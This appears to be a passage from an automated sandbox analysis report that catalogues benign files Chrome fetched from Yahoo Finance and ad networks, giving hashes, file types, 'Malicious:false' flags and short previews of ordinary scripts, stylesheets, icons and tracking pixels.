                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.160788788880504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:DbMYCbBB4pEx9PgdVTrC7MQ+iIo2EBOCoSMgaQMEleYNiLyizRhH2Fv/H+9f2CSW:XMbbBB4pEx9Pgq7MQ+iIo2EBOCoSMgaV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:174BEC9893E8788E1B234F6A8D203F98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F23EB0B803F4957C88E584D35EE9A15846A70A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EC853A5FBF4DB41603FE4799D6622381F393B487C128FE828AA63AE3AFE410E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EB01CB0F43D7878C16A87D1D56BB7889985BDB06F6D060B5AC883950851469B71FBCE03846ABF9B5CD329AA6C4F91871137F1C344FAB9D2588636EDAC9A9EAFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/eh/prebid-config/bp-fp.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (28680)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2775443083440825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:fyR1+Si04qdWLuefSLE7cwvuyU2oiuS6WxkkwCdIJfL2G:qrBQg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0D07B0C691AD5B9DC4CC4105F284309F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:364B2668205D16A46E51F1494043D9122EE6383E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:994A2E63E024D6892F1381CAD6C3D8F0167DC76024327B7785926BF14B7671E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D201887F5DF5D957F3F3A24CF605E77C1F5A45AF8254ACDD6327FBD98F3B73666A03263F494CAFC9DEB0CAEB4CE43D66DF0B80C57C7DEC8646AA66D9340F380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uc/finance/webcore/js/_staticFinProtobuf.4b1559b8e4645fd93a12.mjs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! For license information please see _staticFinProtobuf.4b1559b8e4645fd93a12.mjs.LICENSE.txt */.!function(e){"use strict";var t,n,r,i,o=e.Reader,a=e.util,s=e.roots.default||(e.roots.default={});s.quotefeeder=((r={}).QuoteType=(t={},(n=Object.create(t))[t[0]="NONE"]=0,n[t[5]="ALTSYMBOL"]=5,n[t[7]="HEARTBEAT"]=7,n[t[8]="EQUITY"]=8,n[t[9]="INDEX"]=9,n[t[11]="MUTUALFUND"]=11,n[t[12]="MONEYMARKET"]=12,n[t[13]="OPTION"]=13,n[t[14]="CURRENCY"]=14,n[t[15]="WARRANT"]=15,n[t[17]="BOND"]=17,n[t[18]="FUTURE"]=18,n[t[20]="ETF"]=20,n[t[23]="COMMODITY"]=23,n[t[28]="ECNQUOTE"]=28,n[t[41]="CRYPTOCURRENCY"]=41,n[t[42]="INDICATOR"]=42,n[t[43]="CUL_IDX"]=43,n[t[44]="CUL_SUB_IDX"]=44,n[t[45]="CUL_ASSET"]=45,n[t[1e3]="INDUSTRY"]=1e3,n),r.MarketHours=function(){var e={},t=Object.create(e);return t[e[0]="PRE_MARKET"]=0,t[e[1]="REGULAR_MARKET"]=1,t[e[2]="POST_MARKET"]=2,t[e[3]="EXTENDED_HOURS_MARKET"]=3,t}(),r.OptionType=function(){var e={},t=Object.create(e);return t[e[0]="CALL"]=0,t[e[1]="PUT"]=1,t}(),r.Pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32009)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):41328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.57489917225997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:jI0V6KWzRTLP8B49AF/ewZTPrVpk7uvWXA9JfIFLeCB8BPxz7P7nI:jI0VH4dLk2IrVpyXGKXkPxbnI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CFBFF7D208CCFDBE176B9855AF1EB1FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:023D9077D7129F0EB0203253EA34FE999536FA6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:24ECE61E45E94BCB16969DC25B12DD94CC0C4EF9A968BD524B36D1388141CB4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:229223DAE93D1985B34D543F94DA54FAF04786F907366ECF6BA8A113DD2E2C90D64D9DC7A77EA44FD77CFF0564898A76194E207AD746A5947FD6046F4F2C6B8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*!. * VERSION: 1.19.0. * DATE: 2016-07-14. * UPDATES AND DOCS AT: http://greensock.com. *. * @license Copyright (c) 2008-2016, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. */.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("plugins.CSSPlugin",["plugins.TweenPlugin","TweenLite"],function(a,b){var c,d,e,f,g=function(){a.call(this,"css"),this._overwriteProps.length=0,this.setRatio=g.prototype.setRatio},h=_gsScope._gsDefine.globals,i={},j=g.prototype=new a("css");j.constructor=g,g.version="1.19.0",g.API=2,g.defaultTransformPerspective=0,g.defaultSkewType="compensated",g.defaultSmoothOrigin=!0,j="px",g.suffixMap={top:j,right:j,bottom:j,left
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139728931781201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHCUOFUOGLFUUvXALLGQkHgwdIF8IAdSfFED:+9mc4sl3O4XWMvXA3kHgwKFSZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D2EAE957630F2A5473DCF80198ECE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2CEABA184D273AF24CF40F5AF121FB44E4DA9014
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B74434EE99707AD7DF004D009EB9F45DA79EB0FA8010B15557EC7D9FC550D3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:946DC490B794374A75D318383FD86A900D61DFB20A14B14F8FD274428721209F8746CB84CA2415CAE4D06C1E1AFEA26A07F0602462BAE23F9961FB8DAAD167B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/arrow_forward.8N8VOjY3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m12 4-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z"/></svg>';export{w as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1055)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2690
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.39866636776827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:76A4D84DE75340D59CA06503A14184D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FE3C4A95AF88BE57D1912BB09DC463F69924402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/pagead/js/r20241007/r20110914/client/window_focus_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/crum?cm_dsp_id=57&external_user_id=5131077724534427265
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (301)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.795537284956637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:H69mc4sl3O4Ut8vHhKWJ3S4S1UpMhni6jUs8sh6BqZ/T7:a1PXhLJ3St1Uihni6jUs8bQ7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:79AD25421677DDAAF4639B7CFFF2F1FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:22BE49015F2FA06DBE120F9414F15D43BCD517C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4FCD7D21A472CDC63BE194878AF3066788B8D6D476200D0CC6C9DFBFE0DFCD1C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8B509315FA5D2F636932E2B2F1095900417A3C26B2F0317CD71EA995288E9311A83B3BFEDE7FA7D2C51B456F97DD9FEFDC3B8223184ECA502F91DB2EEF005668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27A6.47 6.47 0 0 0 16 9.5 6.5 6.5 0 1 0 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14"/></svg>';export{s as default};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1296)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.100296535724574
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:l/Atv1aAUC0bAKR3QW4JKRFO7reMn5ChqQp5QLc2qQssDiHnbXAXUFGc2qQpsDt8:tAtb43RgPJKlMIqQnd2qQRDiHnzp12qa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7D08A752DCCA92FCE46070623335F322
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:602F24F1965EB769DE919AC4C4E75C2B17F46E31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B202C3B6DE7002188905C4417E0FAB72239B93E2AF1354DC4845756F4C73969B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:23668183D473FDAAF64F7E7F7836C42AD78A7F496DF934889226BA7540E910866CDB0B558EAD0C25BDD8E1F60914FE29EB1A748C4766BD31A581FE1546E06D14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{f as q,l as w}from"./logUtil.hOue7iAU.js";import{d as b}from"./commonUtil.CI22_Irn.js";async function A(t,{scrId:e,formatted:f=!0,count:r=5,fields:a,start:d=0,sortType:l="",sortField:p="",isPremium:g=!1,silent:i=!1,reuse:h=!0,perfLabel:P="loadPredefinedListDetail"}){if(!e)return Promise.reject(new Error("Bad request for loadPredefinedListDetail: Missing sreener ids"));const[o]=await b(["screener"],t),s=o.getScreenerDetails(e,r);if(h&&(s==null?void 0:s.length)>=r)return s.slice(0,r);try{const n=await q(t,{key:"financeProd",pathname:g?"/v1/finance/premium/screener/predefined/saved":"/v1/finance/screener/predefined/saved",perfLabel:P,query:{count:r,formatted:f,scrIds:e,sortField:p,sortType:l,start:d,...a!=null&&a.length?{fields:a.join(",")}:{}}}),{result:D,error:c}=n.finance;if(c){const m=new Error(c.message??c);return w(t,{count:r,fields:a,formatted:f,isPremium:g,reuse:h,scrId:e,silent:i,sortField:p,sortType:l,start:d},{data:m,perfLabel:"loadPredefinedList"}),o.setError(c),null}co
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2826)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.05781809935793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:ZRldgdsGhnk7R/ZPU3/1W+576yUNofJU7U:7iER/I/1W+uNofv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:454E87661BD1AC9365E8D9755CAB0FF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E78C8C40A901F2D77F943636DA3DBA8BA055D39F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:681C0744A444F7FA36EDF4DF33C5EB927A46D4A3EF259D397A99ECD139028E04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2EB2E8851C43F525D0917CB1460273BCCD6B0DD059F2D430499F866E8C162EE3953200B2E420DA384A4CD12DBDA5104FE1AE91D69825DB57E8530D68D9F7E2A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Select.G4QVlChI.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.itm.yf-1hdw734{white-space:nowrap;margin:0;list-style:none;padding:.625rem var(--space-5);cursor:pointer;line-height:1.25;position:relative;justify-content:flex-start;z-index:2;display:flex;gap:var(--space-3);align-items:center;width:100%;flex-grow:1}.itm.wordWrap.yf-1hdw734{white-space:normal;word-break:break-word}.itm[aria-selected=true].yf-1hdw734{background-color:var(--surface1);color:var(--primary);font-weight:var(--font-bold)}.itm[aria-selected=true].yf-1hdw734 .check{display:initial}.itm.yf-1hdw734:hover,.itm.yf-1hdw734:focus-visible{background-color:var(--table-hover-emph);color:var(--hovered-neutral)}.itm.yf-1hdw734:active{background-color:var(--table-selected-emph);color:var(--primary)}.itm.yf-1hdw734 .check{display:none;margin-left:auto}.borderBottom.yf-1hdw734{border-bottom:1px solid var(--separator)}.border.yf-1hdw734:last-child{border-top:1px solid var(--separator)}.container.yf-1s919cc.yf-1s919cc{position:relative}.menuBtn.yf-1s919cc.yf-1s919cc,.select.yf-1s919cc.yf-1s9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1055)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2690
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.39866636776827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:76A4D84DE75340D59CA06503A14184D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FE3C4A95AF88BE57D1912BB09DC463F69924402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/pagead/js/r20241003/r20110914/client/window_focus_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.965504626917684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:6sEiLQyPOQqzUd3SX7jSbBqt8qL3CWrmeuQwVx4lIHez:fEyP9qI1SX4n8La6wVilhz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:36C7A103DA669E7102DB2E95FA6E1AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2C7D65A7D8EDF0A7F34A61068C20EFAE77B6A4FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FF21CB418590A8EC25869FDCC3F3269793097D8D1AA8981B786791AB9A74A260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1425D51F45B5A0CD2782A9177A81D1A3266F16D452BE366FD8DD0ED15B6D2EC607438025F2F8F3783017037160F2BCE739AF5BBB7AE8AC76D8E5529E0296B4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............R.l.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H................................................T.....pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx..}...E.....od%+$.........o...QGgF.'..(*....t.u@..QT..E.M....HH..........{...A...}..:U}.....o.....d...X.\,S7UY._.C.UiU..51.1..4Fi....J...../.E[..<...kbN.5Y...8.CM..?..k..RS...k(J..S.$u+./..d9*.k....D.V..W.9.-Sy...8..Q...i...Y...U.S...9d.+..c|<.6.|-.RL.5nOq.;....SD...-.Z...0..vF&.gl..U.;....j....>w..E|.9T.8bM.G..(_j......xY...Wm\..UZ.x..&.\....q.M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32043)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):34882
